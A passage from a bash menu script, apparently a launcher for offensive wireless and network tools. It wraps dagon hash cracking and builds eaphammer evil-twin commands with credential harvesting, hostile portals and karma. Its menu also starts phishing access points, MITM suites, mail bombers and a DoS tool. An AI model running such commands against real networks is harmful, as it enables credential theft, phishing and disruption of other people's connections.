1829 | DICT="\e[1;31mNONE\e[0m"
1830 | elif [[ $DICT = "" && $DICTATTACK = "ON" ]]
1831 | then
1832 | DICT="\e[1;31mNONE\e[0m"
1833 | fi
1834 | if [[ $DICTTYPE = 1 ]]
1835 | then
1836 | DICT="$DICTPATH"
1837 | elif [[ $DICTTYPE = 2 ]]
1838 | then
1839 | DICT="multiple"
1840 | elif [[ $DICTTYPE = 3 ]]
1841 | then
1842 | DICT="$DICTPATH folder"
1843 | fi
1844 | echo -e " "$YS"5"$CE") Specify dictionary/ies CURRENT:$DICT"
1845 | echo -e "------------------------------------------------"
1846 | echo -e ""$YS"back"$CE") Go back "$YS"update"$CE") Update dagon"
1847 | echo -e ""$YS"start"$CE") Start"
1848 | echo -e "Choose: "
1849 | read DAGON
1850 | clear
1851 | if [ $DAGON = "back" ]
1852 | then
1853 | break
1854 | elif [ $DAGON = "4" ]
1855 | then
1856 | if [[ $DICTATTACK = "OFF" ]]
1857 | then
1858 | DICTATTACK="ON"
1859 | else
1860 | DICTATTACK="OFF"
1861 | fi
1862 | elif [ $DAGON = "update" ]
1863 | then
1864 | cd /root/dagon
1865 | python dagon.py --update
1866 | sleep 3
1867 | elif [ $DAGON = "start" ]
1868 | then
1869 | if [[ $HASH = "" || $HASH = "\e[1;31mNONE\e[0m" ]]
1870 | then
1871 | echo -e ""$RS"No hash selected."$CE""
1872 | sleep 3
1873 | fi
1874 | if [[ $DICTATTACK = "ON" && $DICT = "\e[1;31mNONE\e[0m" ]]
1875 | then
1876 | echo -e ""$RS"No dictionary selected, but dictionary option is enabled"$CE""
1877 | sleep 5
1878 | continue
1879 | fi
1880 | cd /root/dagon
1881 | if [ $HASHTYPE = 1 ]
1882 | then
1883 | if [[ $CORV = "crack" ]]
1884 | then
1885 | HASHCOMMAND="python dagon.py -c "$HASH" --bruteforce"
1886 | else
1887 | HASHCOMMAND="python dagon.py -v "$HASH""
1888 | fi
1889 | elif [ $HASHTYPE = 2 || $HASHTYPE = 3 ]
1890 | then
1891 | if [[ $CORV = "crack" ]]
1892 | then
1893 | HASHCOMMAND="python dagon.py -l "$HASH" --bruteforce"
1894 | else
1895 | HASHCOMMAND="python dagon.py -V "$HASH""
1896 | fi
1897 | fi
1898 | if [[ $DICTATTACK = "ON" ]]
1899 | then
1900 | if [ $DICTTYPE = 1 ]
1901 | then
1902 | DICTCOMMAND="-w $DICTPATH"
1903 | elif [ $DICTTYPE = 2 ]
1904 | then
1905 | DICTCOMMAND="-W $DICTPATH"
1906 | elif [ $DICTTYPE = 3 ]
1907 | then
1908 | DICTCOMMAND="-D $DICTPATH"
1909 | fi
1910 | else
1911 | DICTCOMMAND=""
1912 | fi
1913 |
1914 | $HASHCOMMAND $DICTCOMMAND | tee "$LPATH/hashlog.txt"
1915 | echo -e "$PAKTGB"
1916 | $READAK
1917 | elif [ $DAGON = 5 ]
1918 | then
1919 | echo -e ""$YS" 1"$CE") Select one disctionary"
1920 | echo -e ""$YS" 2"$CE") Select multiple disctionaries"
1921 | echo -e ""$YS" 3"$CE") Select a folder with disctionaries"
1922 | echo -e ""$YS"back"$CE") Go back"
1923 | echo -e "Choose: "
1924 | read DICTSEL
1925 | clear
1926 | if [ $DICTSEL = 1 ]
1927 | then
1928 | echo -e "Type the path of the dictionary:"
1929 | read DICTPATH
1930 | if [ ! -f $DICTPATH ]
1931 | then
1932 | echo -e ""$RS"No such file"$CE""
1933 | sleep 2
1934 | continue
1935 | fi
1936 | DICTTYPE=1
1937 | elif [ $DICTSEL = 2 ]
1938 | then
1939 | echo -e "Type the path of the first dictionary:"
1940 | read DICTPATH
1941 | if [ ! -f $DICTPATH ]
1942 | then
1943 | echo -e ""$RS"No such file"$CE""
1944 | sleep 2
1945 | continue
1946 | fi
1947 | while true
1948 | do
1949 | clear
1950 | echo -e ""$RS"----------TO STOP, TYPE 0----------"
1951 | echo -e "Type the path of the next dictionary: "
1952 | read DICTNEXT
1953 | if [[ $DICTNEXT = "0" || $DICTNEXT = "o" || $DICTNEXT = "O" ]]
1954 | then
1955 | DICTTYPE=2
1956 | break
1957 | fi
1958 | if [ ! -f $DICTNEXT ]
1959 | then
1960 | echo -e ""$RS"No such file"$CE""
1961 | sleep 2
1962 | continue
1963 | fi
1964 | DICTPATH=""$DICTPATH","$DICTNEXT""
1965 | done
1966 | elif [ $DICTSEL = 3 ]
1967 | then
1968 | echo -e "Type the path of the folder:"
1969 | read DICTPATH
1970 | if [ ! -d $DICTPATH ]
1971 | then
1972 | echo -e ""$RS"No such folder"$CE""
1973 | sleep 2
1974 | continue
1975 | fi
1976 | DICTTYPE=3
1977 | elif [ $DICTSEL = "back" ]
1978 | then
1979 | continue
1980 | fi
1981 | elif [ $DAGON = 3 ]
1982 | then
1983 | if [ ! -f /root/lscript/hashlog.txt ]
1984 | then
1985 | echo -e ""$RS"No log found."$CE""
1986 | sleep 2
1987 | else
1988 | cat /root/lscript/hashlog.txt
1989 | echo -e "$PAKTGB"
1990 | $READAK
1991 | fi
1992 | elif [ $DAGON = 1 ]
1993 | then
1994 | clear
1995 | echo -e ""$YS" 1"$CE") Type a hash"
1996 | echo -e ""$YS" 2"$CE") Type multiple hashes"
1997 | echo -e ""$YS" 3"$CE") Select a file with hashes"
1998 | echo -e ""$YS"back"$CE") Go back"
1999 | echo -e "Choose: "
2000 | read HASHES
2001 | clear
2002 | if [ $HASHES = "back" ]
2003 | then
2004 | continue
2005 | elif [ $HASHES = 1 ]
2006 | then
2007 | echo -e "Type your hash: "
2008 | read HASH
2009 | HASHTYPE=1
2010 | elif [ $HASHES = 2 ]
2011 | then
2012 | echo -e "Type your first hash: "
2013 | read HASH
2014 | echo -e "$HASH" > $LPATH/hashes.txt
2015 | while true
2016 | do
2017 | clear
2018 | echo -e ""$RS"----------TO STOP, TYPE 0----------"
2019 | echo -e "Type your next hash: "
2020 | read HASH
2021 | if [[ $HASH = "0" || $HASH = "o" || $HASH = "O" ]]
2022 | then
2023 | HASH="multiple"
2024 | break
2025 | fi
2026 | echo -e "$HASH" >> $LPATH/hashes.txt
2027 | done
2028 | HASHTYPE=2
2029 | elif [ $HASHES = 3 ]
2030 | then
2031 | echo -e "Type the full path of the file: "
2032 | read HASHPATH
2033 | if [[ ! -f $HASHPATH ]]
2034 | then
2035 | echo -e ""$RS"There is not such file."$CE""
2036 | sleep 3
2037 | else
2038 | HASH="$HASHPATH"
2039 | fi
2040 | HASHTYPE=3
2041 | fi
2042 | elif [ $DAGON = 00 ]
2043 | then
2044 | exec bash $0
2045 | elif [ $DAGON = 0 ]
2046 | then
2047 | clear
2048 | exit
2049 | elif [ $DAGON = 2 ]
2050 | then
2051 | if [[ $CORV = "crack" ]]
2052 | then
2053 | CORV="verify"
2054 | else
2055 | CORV="crack"
2056 | fi
2057 | fi
2058 | done
2059 | }
2060 | function eaphammer_automation
2061 | {
2062 | printf '\033]2;Eaphammer\a'
2063 | while true
2064 | do
2065 | clear
2066 | if [[ $EAPHIFACE = "" ]]
2067 | then
2068 | EAPHIFACE="$WLANN"
2069 | fi
2070 | if [[ $EAPHESSID = "" ]]
2071 | then
2072 | EAPHESSID=""$RS"NONE"$CE""
2073 | OK1=0
2074 | elif [[ $EAPHESSID != "\e[1;31mNONE\e[0m" ]]
2075 | then
2076 | OK1=1
2077 | fi
2078 | if [[ $EAPHBSSID = "" ]]
2079 | then
2080 | EAPHBSSID=""$RS"NONE"$CE""
2081 | OK1=0
2082 | fi
2083 | if [[ $EAPHCHANNEL = "" ]]
2084 | then
2085 | EAPHCHANNEL=""$RS"NONE"$CE""
2086 | OK1=0
2087 | fi
2088 | if [[ $EAPHWPA = "" ]]
2089 | then
2090 | EAPHWPA="2"
2091 | fi
2092 | if [[ $EAPHAUTH = "" ]]
2093 | then
2094 | EAPHAUTH=""$RS"NONE"$CE""
2095 | OK1=0
2096 | fi
2097 | if [[ $EAPHCREDS = "" ]]
2098 | then
2099 | EAPHCREDS="OFF"
2100 | fi
2101 | if [[ $EAPHHOSTILE = "" ]]
2102 | then
2103 | EAPHHOSTILE="OFF"
2104 | fi
2105 | if [[ $EAPHCAPTIVE = "" ]]
2106 | then
2107 | EAPHCAPTIVE="OFF"
2108 | fi
2109 | if [[ $EAPHPIVOT = "" ]]
2110 | then
2111 | EAPHPIVOT="OFF"
2112 | fi
2113 | if [[ $EAPHKARMA = "" ]]
2114 | then
2115 | EAPHKARMA="OFF"
2116 | fi
2117 | if [[ $EAPHAIRCRACK = "" ]]
2118 | then
2119 | EAPHAIRCRACK="OFF"
2120 | fi
2121 | if [[ $EAPHINTAUTO = "" ]]
2122 | then
2123 | EAPHINTAUTO="OFF"
2124 | fi
2125 | if [[ $EAPHAIRCRACK = "OFF" && $EAPHINTAUTO = "OFF" && $EAPHWORD = "" ]]
2126 | then
2127 | EAPHWORD="OFF"
2128 | fi
2129 | if [[ $EAPHAIRCRACK = "OFF" && $EAPHINTAUTO = "OFF" && $EAPHWORD = "OFF" ]]
2130 | then
2131 | EAPHWORD="OFF"
2132 | fi
2133 | OK2=1
2134 | if [[ $EAPHAIRCRACK != "OFF" ]]
2135 | then
2136 | if [[ $EAPHWORD = "OFF" || $EAPHWORD = "\e[1;31mNONE\e[0m" ]]
2137 | then
2138 | EAPHWORD="\e[1;31mNONE\e[0m"
2139 | OK2=0
2140 | fi
2141 | fi
2142 | if [[ $EAPHINTAUTO = "ON" || $EAPHWORD = "\e[1;31mNONE\e[0m" ]]
2143 | then
2144 | if [[ $EAPHWORD = "OFF" ]]
2145 | then
2146 | EAPHWORD="\e[1;31mNONE\e[0m"
2147 | OK2=0
2148 | fi
2149 | fi
2150 | if [[ $EAPHINTAUTO = "OFF" && $EAPHAIRCRACK = "OFF" ]]
2151 | then
2152 | if [[ $EAPHWORD = "\e[1;31mNONE\e[0m" ]]
2153 | then
2154 | EAPHWORD="OFF"
2155 | fi
2156 | fi
2157 | echo -e ""$YS" 1"$CE") Create a new RADIUS cert for your AP"
2158 | echo -e ""$YS" 2"$CE") Set your interface for the AP CURRENT: $EAPHIFACE"
2159 | echo -e ""$YS" 3"$CE") Specify access point ESSID CURRENT: $EAPHESSID"
2160 | echo -e ""$YS" 4"$CE") Specify access point BSSID CURRENT: $EAPHBSSID"
2161 | echo -e ""$YS" 5"$CE") Specify access point channel CURRENT: $EAPHCHANNEL"
2162 | echo -e ""$YS" 6"$CE") Specify WPA type CURRENT: $EAPHWPA"
2163 | echo -e ""$YS" 7"$CE") Specify auth type CURRENT: $EAPHAUTH"
2164 | echo -e ""$YS" 8"$CE") Harvest EAP creds CURRENT: $EAPHCREDS"
2165 | echo -e ""$YS" 9"$CE") Force clients to connect to hostile portal CURRENT: $EAPHHOSTILE"
2166 | echo -e ""$YS"10"$CE") Force clients to connect to captive portal CURRENT: $EAPHCAPTIVE"
2167 | echo -e ""$YS"11"$CE") Perform an indirect wireless pivot CURRENT: $EAPHPIVOT"
2168 | echo -e ""$YS"12"$CE") Enable karma CURRENT: $EAPHKARMA"
2169 | echo -e ""$YS"13"$CE") Use autocrack/add with remote cracking rig CURRENT: $EAPHAIRCRACK"
2170 | echo -e ""$YS"14"$CE") Use internal autocrack CURRENT: $EAPHINTAUTO"
2171 | echo -e ""$YS"15"$CE") Specify wordlist for autocrack CURRENT: $EAPHWORD"
2172 | echo -e ""$YS"start"$CE") Start "
2173 | echo -e ""$YS"00"$CE") Main menu"
2174 | echo -e ""$YS" back"$CE") Go back"
2175 | echo -e "Choose: "
2176 | read EAPH
2177 | clear
2178 | if [ $EAPH = 1 ]
2179 | then
2180 | cd /root/eaphammer
2181 | ./eaphammer --cert-wizard
2182 | elif [ $EAPH = 2 ]
2183 | then
2184 | echo -e "Type the interface you want to use: "
2185 | read EAPHIFACE
2186 | elif [ $EAPH = 3 ]
2187 | then
2188 | echo -e "Type the ESSID: "
2189 | read EAPHESSID
2190 | elif [ $EAPH = 4 ]
2191 | then
2192 | echo -e "Type the BSSID: "
2193 | read EAPHBSSID
2194 | elif [ $EAPH = 5 ]
2195 | then
2196 | echo -e "Type the channel: "
2197 | read EAPHCHANNEL
2198 | elif [ $EAPH = 6 ]
2199 | then
2200 | if [[ $EAPHWPA = 1 ]]
2201 | then
2202 | EAPHWPA=2
2203 | else
2204 | EAPHWPA=1
2205 | fi
2206 | elif [ $EAPH = 7 ]
2207 | then
2208 | echo -e ""$YS" 1"$CE") Open"
2209 | echo -e ""$YS" 2"$CE") ttls"
2210 | echo -e ""$YS" 3"$CE") peap"
2211 | echo -e "Choose: "
2212 | read PAUTH
2213 | if [ $PAUTH = 1 ]
2214 | then
2215 | EAPHAUTH="open"
2216 | elif [ $PAUTH = 2 ]
2217 | then
2218 | EAPHAUTH="ttls"
2219 | elif [ $PAUTH = 3 ]
2220 | then
2221 | EAPHAUTH="peap"
2222 | fi
2223 | elif [ $EAPH = 8 ]
2224 | then
2225 | if [[ $EAPHCREDS = "OFF" ]]
2226 | then
2227 | EAPHCREDS="ON"
2228 | else
2229 | EAPHCREDS="OFF"
2230 | fi
2231 | elif [ $EAPH = 9 ]
2232 | then
2233 | if [[ $EAPHHOSTILE = "OFF" ]]
2234 | then
2235 | EAPHHOSTILE="ON"
2236 | else
2237 | EAPHHOSTILE="OFF"
2238 | fi
2239 | elif [ $EAPH = 10 ]
2240 | then
2241 | if [[ $EAPHCAPTIVE = "OFF" ]]
2242 | then
2243 | EAPHCAPTIVE="ON"
2244 | else
2245 | EAPHCAPTIVE="OFF"
2246 | fi
2247 | elif [ $EAPH = 11 ]
2248 | then
2249 | if [[ $EAPHPIVOT = "OFF" ]]
2250 | then
2251 | EAPHPIVOT="ON"
2252 | else
2253 | EAPHPIVOT="OFF"
2254 | fi
2255 | elif [ $EAPH = 12 ]
2256 | then
2257 | if [[ $EAPHKARMA = "OFF" ]]
2258 | then
2259 | EAPHKARMA="ON"
2260 | else
2261 | EAPHKARMA="OFF"
2262 | fi
2263 | elif [ $EAPH = 13 ]
2264 | then
2265 | if [[ $EAPHAIRCRACK = "OFF" ]]
2266 | then
2267 | clear
2268 | echo -e "Hostname: "
2269 | read HOSTN
2270 | echo -e "Port: "
2271 | read PORT
2272 | clear
2273 | EAPHAIRCRACK=""$HOSTN":"$PORT""
2274 | else
2275 | EAPHAIRCRACK="OFF"
2276 | fi
2277 | elif [ $EAPH = 14 ]
2278 | then
2279 | if [[ $EAPHINTAUTO = "OFF" ]]
2280 | then
2281 | EAPHINTAUTO="ON"
2282 | else
2283 | EAPHINTAUTO="OFF"
2284 | fi
2285 | elif [ $EAPH = 15 ]
2286 | then
2287 | if [[ $EAPHWORD != "OFF" && $EAPHWORD != "\e[1;31mNONE\e[0m" ]]
2288 | then
2289 | EAPHWORD="OFF"
2290 | else
2291 | clear
2292 | echo -e "Type the full wordlist path: "
2293 | read EAPHWORD
2294 | fi
2295 | elif [ $EAPH = "back" ]
2296 | then
2297 | clear
2298 | break
2299 | elif [ $EAPH = "00" ]
2300 | then
2301 | clear
2302 | exec bash $0
2303 | elif [ $EAPH = "0" ]
2304 | then
2305 | clear
2306 | exit
2307 | elif [ $EAPH = "start" ]
2308 | then
2309 | clear
2310 | if [ $OK1 != 1 ]
2311 | then
2312 | echo -e "You haven't specified the important requirements"
2313 | sleep 4
2314 | continue
2315 | fi
2316 | if [ $OK2 != 1 ]
2317 | then
2318 | echo -e "You haven't specified a wordlist for the autocrack"
2319 | sleep 4
2320 | continue
2321 | fi
2322 | if [[ $EAPHCREDS = "ON" ]]
2323 | then
2324 | CREDS="--creds"
2325 | else
2326 | CREDS=""
2327 | fi
2328 | if [[ $EAPHHOSTILE = "ON" ]]
2329 | then
2330 | HOSTILE="--hostile-portal"
2331 | else
2332 | HOSTILE=""
2333 | fi
2334 | if [[ $EAPHCAPTIVE = "ON" ]]
2335 | then
2336 | CAPTIVE="--captive-portal"
2337 | else
2338 | CAPTIVE=""
2339 | fi
2340 | if [[ $EAPHPIVOT = "ON" ]]
2341 | then
2342 | PIVOT="--pivot"
2343 | else
2344 | PIVOT=""
2345 | fi
2346 | if [[ $EAPHKARMA = "ON" ]]
2347 | then
2348 | KARMA="--karma"
2349 | else
2350 | KARMA=""
2351 | fi
2352 | if [[ $EAPHINTAUTO = "ON" ]]
2353 | then
2354 | INTAUTO="--local-autocrack"
2355 | else
2356 | INTAUTO=""
2357 | fi
2358 | if [[ $EAPHAIRCRACK != "OFF" ]]
2359 | then
2360 | AIRCRACK="--remote-autocrack $EAPHAIRCRACK"
2361 | else
2362 | AIRCRACK=""
2363 | fi
2364 | if [[ $EAPHAIRCRACK != "OFF" || $EAPHINTAUTO != "OFF" ]]
2365 | then
2366 | WORD="--wordlist $EAPHWORD"
2367 | else
2368 | WORD=""
2369 | fi
2370 | IFACE="-i $EAPHIFACE"
2371 | CHANNEL="-c $EAPHCHANNEL"
2372 | ESSID="-e $EAPHESSID"
2373 | BSSID="-b $EAPHBSSID"
2374 | WPA="--wpa $EAPHWPA"
2375 | AUTH="--auth $EAPHAUTH"
2376 | cd /root/eaphammer
2377 | ./eaphammer $IFACE $CHANNEL $BSSID $ESSID $WPA $AUTH $PIVOT $KARMA $INTAUTO $CAPTIVE $HOSTILE $CREDS $AIRCRACK $WORD
2378 |
2379 | fi
2380 | done
2381 | }
2382 | function wifi_tools
2383 | {
2384 | while true
2385 | do
2386 | printf '\033]2;WIFI TOOLS\a'
2387 | clear
2388 | echo -e "---------------------------"$RS"WIFI TOOLS"$CE"----------------------------"
2389 | if [ -d /root/fluxion ]
2390 | then
2391 | echo -e ""$YS" 1"$CE") Fluxion Multitool-Fake AP with pass confirmation"
2392 | else
2393 | echo -e ""$RS" 1"$CE") "$RS"Fluxion"$CE" Multitool-Fake AP with pass confirmation"
2394 | fi
2395 | if [ -f /usr/bin/wifite ]
2396 | then
2397 | echo -e ""$YS" 2"$CE") Wifite Multitool"
2398 | else
2399 | echo -e ""$RS" 2"$CE") "$RS"Wifite"$CE" Multitool"
2400 | fi
2401 | if [ -d /root/wifiphisher ]
2402 | then
2403 | echo -e ""$YS" 3"$CE") Wifiphisher Multitool-Fake AP etc.."
2404 | else
2405 | echo -e ""$RS" 3"$CE") "$RS"Wifiphisher"$CE" Multitool-Fake AP etc.."
2406 | fi
2407 | if [ -d /root/Zatacker ]
2408 | then
2409 | echo -e ""$YS" 4"$CE") Zatacker MITM-NMAP-Mail Spammer..(Install it manually)"
2410 | else
2411 | echo -e ""$RS" 4"$CE") "$RS"Zatacker"$CE" MITM-NMAP-Mail Spammer..(Install it manually)"
2412 | fi
2413 | if [ -d /root/morpheus ]
2414 | then
2415 | echo -e ""$YS" 5"$CE") Morpheus ------------ULTIMATE MITM SUIT------------"
2416 | else
2417 | echo -e ""$RS" 5"$CE") "$RS"Morpheus"$CE" ------------ULTIMATE MITM SUIT------------"
2418 | fi
2419 | if [ -d /root/osrframework ]
2420 | then
2421 | echo -e ""$YS" 6"$CE") Osrfconsole Checks usernames-phones to platforms etc.."
2422 | else
2423 | echo -e ""$RS" 6"$CE") "$RS"Osrfconsole"$CE" Checks usernames-phones to platforms etc.."
2424 | fi
2425 | if [ -d /root/hakkuframework ]
2426 | then
2427 | echo -e ""$YS" 7"$CE") Hakku Multitool-mail bomb-sniffs-cracks etc.."
2428 | else
2429 | echo -e ""$RS" 7"$CE") "$RS"Hakku"$CE" Multitool-mail bomb-sniffs-cracks etc.."
2430 | fi
2431 | if [ -d /root/Trity ]
2432 | then
2433 | echo -e ""$YS" 8"$CE") Trity Multitool-locate ip-email bombs-brutforse etc.."
2434 | else
2435 | echo -e ""$RS" 8"$CE") "$RS"Trity"$CE" Multitool-locate ip-email bombs-brutforse etc.."
2436 | fi
2437 | if [ -d /root/Dracnmap ]
2438 | then
2439 | echo -e ""$YS" 9"$CE") Dracnmap Many scan options"
2440 | else
2441 | echo -e ""$RS" 9"$CE") "$RS"Dracnmap"$CE" Many scan options"
2442 | fi
2443 | if [ -d "/usr/share/fern-wifi-cracker" ]
2444 | then
2445 | echo -e ""$YS"10"$CE") Fern Wifi cracker GUI"
2446 | else
2447 | echo -e ""$RS"10"$CE") "$RS"Fern"$CE" Wifi cracker GUI"
2448 | fi
2449 | if [ -f /usr/sbin/netdiscover ]
2450 | then
2451 | echo -e ""$YS"11"$CE") Netdiscover IPs and MACs on your net"
2452 | else
2453 | echo -e ""$RS"11"$CE") "$RS"Netdiscover"$CE" IPs and MACs on your net"
2454 | fi
2455 | if [ -d /root/kickthemout ]
2456 | then
2457 | echo -e ""$YS"12"$CE") KickThemOut Kick clients out of your network"
2458 | else
2459 | echo -e ""$RS"12"$CE") "$RS"KickThemOut"$CE" Kick clients out of your network"
2460 | fi
2461 | if [ -d "/usr/share/ghost-phisher" ]
2462 | then
2463 | echo -e ""$YS"13"$CE") Ghost-Phisher Fake AP,MITM,Session hijacking etc..."
2464 | else
2465 | echo -e ""$RS"13"$CE") "$RS"Ghost-Phisher"$CE" Fake AP,MITM,Session hijacking etc..."
2466 | fi
2467 | if [ -d /root/The-Eye ]
2468 | then
2469 | echo -e ""$YS"14"$CE") The Eye Detects ARP poisoning DNS spoofing etc..."
2470 | else
2471 | echo -e ""$RS"14"$CE") "$RS"The Eye"$CE" Detects ARP poisoning DNS spoofing etc..."
2472 | fi
2473 | if [ -d /root/xerxes ]
2474 | then
2475 | echo -e ""$YS"15"$CE") Xerxes The most powerful DoS tool(CAUTION)"
2476 | else
2477 | echo -e ""$RS"15"$CE") "$RS"Xerxes"$CE" The most powerful DoS tool(CAUTION)"
2478 | fi
2479 | #~ echo -e ""$YS"16"$CE") ShARP(problematic) Detects who is spoofing on your network"
2480 | if [ -d /root/mdk3-master ]
2481 | then
2482 | echo -e ""$YS"16"$CE") Mdk3-master Tries to lock / reboot AP and more..."
2483 | else
2484 | echo -e ""$RS"16"$CE") "$RS"Mdk3-master"$CE" Tries to lock / reboot AP and more..."
2485 | fi
2486 | if [ -d /root/mdk3-master ]
2487 | then
2488 | echo -e ""$YS"17"$CE") Mdk3-master Tries to reboot the AP and unlock the WPS lock"
2489 | else
2490 | echo -e ""$RS"17"$CE") "$RS"Mdk3-master"$CE" Tries to reboot the AP and unlock the WPS lock"
2491 | fi
2492 | if [ -d /root/KatanaFramework ]
2493 | then
2494 | echo -e ""$YS"18"$CE") Katana Framework Many penetration testing features"
2495 | else
2496 | echo -e ""$RS"18"$CE") "$RS"Katana Framework"$CE" Many penetration testing features"
2497 | fi
2498 | if [ -d /root/airgeddon ]
2499 | then
2500 | echo -e ""$YS"19"$CE") Airgeddon Evil twin-WPA WPA2-WEP-WPS and more"
2501 | else
2502 | echo -e ""$RS"19"$CE") "$RS"Airgeddon"$CE" Evil twin-WPA WPA2-WEP-WPS and more"
2503 | fi
2504 | if [ -f /usr/bin/websploit ]
2505 | then
2506 | echo -e ""$YS"20"$CE") Websploit Wireless attack-multitool"
2507 | else
2508 | echo -e ""$RS"20"$CE") "$RS"Websploit"$CE" Wireless attack-multitool"
2509 | fi
2510 | if [ -d /etc/openvas ]
2511 | then
2512 | echo -e ""$YS"21"$CE") Openvas Vulnerability scanner LAN"
2513 | else
2514 | echo -e ""$RS"21"$CE") "$RS"Openvas"$CE" Vulnerability scanner LAN"
2515 | fi
2516 | if [ -f /usr/bin/ipscan ]
2517 | then
2518 | echo -e ""$YS"22"$CE") Angry IP Scanner IP Scanner"
2519 | else
2520 | echo -e ""$RS"22"$CE") "$RS"Angry IP Scanner"$CE" IP Scanner"
2521 | fi
2522 | if [ -d /root/routersploit ]
2523 | then
2524 | echo -e ""$YS"23"$CE") Routersploit Find/exploit router vulnerabilities"
2525 | else
2526 | echo -e ""$RS"23"$CE") "$RS"Routersploit"$CE" Find/exploit router vulnerabilities"
2527 | fi
2528 | if [ -d /root/nWatch ]
2529 | then
2530 | echo -e ""$YS"24"$CE") nWatch IP scanner/OS detection"
2531 | else
2532 | echo -e ""$RS"24"$CE") "$RS"nWatch"$CE" IP scanner/OS detection"
2533 | fi
2534 | if [ -d /root/eternal_scanner ]
2535 | then
2536 | echo -e ""$YS"25"$CE") Eternal scanner Scans hosts for eternalblue vulnerabilities"
2537 | else
2538 | echo -e ""$RS"25"$CE") "$RS"Eternal scanner"$CE" Scans hosts for eternalblue vulnerabilities"
2539 | fi
2540 | if [ -d /root/eaphammer ]
2541 | then
2542 | echo -e ""$YS"26"$CE") Eaphammer Evil twin attacks against WPA2-Enterprise networks. "
2543 | else
2544 | echo -e ""$RS"26"$CE") "$RS"Eaphammer"$CE" Evil twin attacks against WPA2-Enterprise networks. "
2545 | fi
2546 | echo -e ""$YS"back"$CE") Go back"
2547 | echo -e ""$YS"00"$CE") Main menu"
2548 | #echo -e ""$YS" 0"$CE") EXIT"
2549 | echo -e "Choose: "
2550 | read -e APPP
2551 | clear
2552 | if [ "$APPP" = "1" ]
2553 | then
2554 | if [ -d /root/fluxion ]
2555 | then
2556 | cd /root/fluxion
2557 | ./fluxion
2558 | cd
2559 | else
2560 | echo -e "$TNI"
2561 | echo -e "$PAKTGB"
2562 | $READAK
2563 | fi
2564 | elif [ "$APPP" = "2" ]
2565 | then
2566 | if [ -f /usr/bin/wifite ]
2567 | then
2568 | wifite
2569 | else
2570 | echo -e "$TNI"
2571 | echo -e "$PAKTGB"
2572 | $READAK
2573 | fi
2574 | elif [ "$APPP" = "3" ]
2575 | then
2576 | if [ -d /root/wifiphisher ]
2577 | then
2578 | echo -e "Do you have 1 or 2 wireless interfaces?: "
2579 | read ONEORTWO
2580 | if [ "$ONEORTWO" = "1" ]
2581 | then
2582 | clear
2583 | echo -e "Note that with only 1 wireless interface, wifiphisher doesn't deauthenticate the AP."
2584 | sleep 1
2585 | echo -e ""
2586 | echo -e "$PAKTC"
2587 | $READAK
2588 | clear
2589 | wifiphisher -nJ
2590 | else
2591 | clear
2592 | wifiphisher
2593 | fi
2594 | else
2595 | echo -e "$TNI"
2596 | echo -e "$PAKTGB"
2597 | $READAK
2598 | fi
2599 | elif [ "$APPP" = "d3" ]
2600 | then
2601 | if [ -d /root/wifiphisher ]
2602 | then
2603 | clear
2604 | echo -e "Enter the name of the access point you want to create: "
2605 | read -e ESSIDAP
2606 | wifiphisher --nojamming --essid "$ESSIDAP" -p oauth-login
2607 | else
2608 | echo -e "$TNI"
2609 | echo -e "$PAKTGB"
2610 | $READAK
2611 | fi
2612 | elif [ "$APPP" = "4" ]
2613 | then
2614 | if [ -d /root/Zatacker ]
2615 | then
2616 | if [ -d "/root/Zatacker" ]
2617 | then
2618 | cd /root/Zatacker
2619 | ./ZT.sh
2620 | cd
2621 | else
2622 | echo -e "You have to install it manually since its not on github.Sorry."
2623 | sleep 4
2624 | exec bash "$0"
2625 | fi
2626 | else
2627 | echo -e "$TNI"
2628 | echo -e "$PAKTGB"
2629 | $READAK
2630 | fi
2631 | elif [ "$APPP" = "5" ]
2632 | then
2633 | if [ -d /root/morpheus ]
2634 | then
2635 | cd /root/morpheus
2636 | ./morpheus.sh
2637 | cd
2638 | else
2639 | echo -e "$TNI"
2640 | echo -e "$PAKTGB"
2641 | $READAK
2642 | fi
2643 | elif [ "$APPP" = "7" ]
2644 | then
2645 | if [ -d /root/hakkuframework ]
2646 | then
2647 | echo -e "type: 'show modules' to start"
2648 | sleep 2
2649 | clear
2650 | cd /root/hakkuframework
2651 | ./hakku
2652 | cd
2653 | else
2654 | echo -e "$TNI"
2655 | echo -e "$PAKTGB"
2656 | $READAK
2657 | fi
2658 | elif [ "$APPP" = "8" ]
2659 | then
2660 | if [ -d /root/Trity ]
2661 | then
2662 | echo -e "type: 'help' to start"
2663 | sleep 2
2664 | clear
2665 | trity
2666 | else
2667 | echo -e "$TNI"
2668 | echo -e "$PAKTGB"
2669 | $READAK
2670 | fi
2671 | elif [ "$APPP" = "9" ]
2672 | then
2673 | if [ -d "/root/Dracnmap" ]
2674 | then
2675 | cd /root/Dracnmap/
2676 | ./dracnmap-v*.sh
2677 | cd
2678 | else
2679 | echo -e "$TNI"
2680 | echo -e "$PAKTGB"
2681 | $READAK
2682 | fi
2683 | elif [ "$APPP" = "10" ]
2684 | then
2685 | if [ -d "/usr/share/fern-wifi-cracker" ]
2686 | then
2687 | cd /root/Fern-Wifi-Cracker
2688 | python execute.py
2689 | cd
2690 | else
2691 | echo -e "$TNI"
2692 | echo -e "$PAKTGB"
2693 | $READAK
2694 | fi
2695 | elif [ "$APPP" = "11" ]
2696 | then
2697 | if [ -f /usr/sbin/netdiscover ]
2698 | then
2699 | echo -e "Range ("$YS"Enter"$CE"=192.168.1.0/24):"
2700 | read NRANGE
2701 | if [[ -z $NRANGE ]]
2702 | then
2703 | NRANGE="192.168.1.0/24"
2704 | fi
2705 | netdiscover -r $NRANGE
2706 | else
2707 | echo -e "$TNI"
2708 | echo -e "$PAKTGB"
2709 | $READAK
2710 | fi
2711 | elif [ "$APPP" = "12" ]
2712 | then
2713 | if [ -d "/root/kickthemout" ]
2714 | then
2715 | cd /root/kickthemout
2716 | python kickthemout.py
2717 | cd
2718 | else
2719 | echo -e "$TNI"
2720 | echo -e "$PAKTGB"
2721 | $READAK
2722 | fi
2723 | elif [ "$APPP" = "13" ]
2724 | then
2725 | if [ -d "/usr/share/ghost-phisher" ]
2726 | then
2727 | cd /root/ghost-phisher/Ghost-Phisher
2728 | python ghost.py
2729 | cd
2730 | else
2731 | echo -e "$TNI"
2732 | echo -e "$PAKTGB"
2733 | $READAK
2734 | fi
2735 | elif [ "$APPP" = "14" ]
2736 | then
2737 | if [ -d "/root/The-Eye" ]
2738 | then
2739 | cd /root/The-Eye
2740 | ./TheEye
2741 | cd
2742 | else
2743 | echo -e "$TNI"
2744 | echo -e "$PAKTGB"
2745 | $READAK
2746 | fi
2747 | elif [ "$APPP" = "15" ]
2748 | then
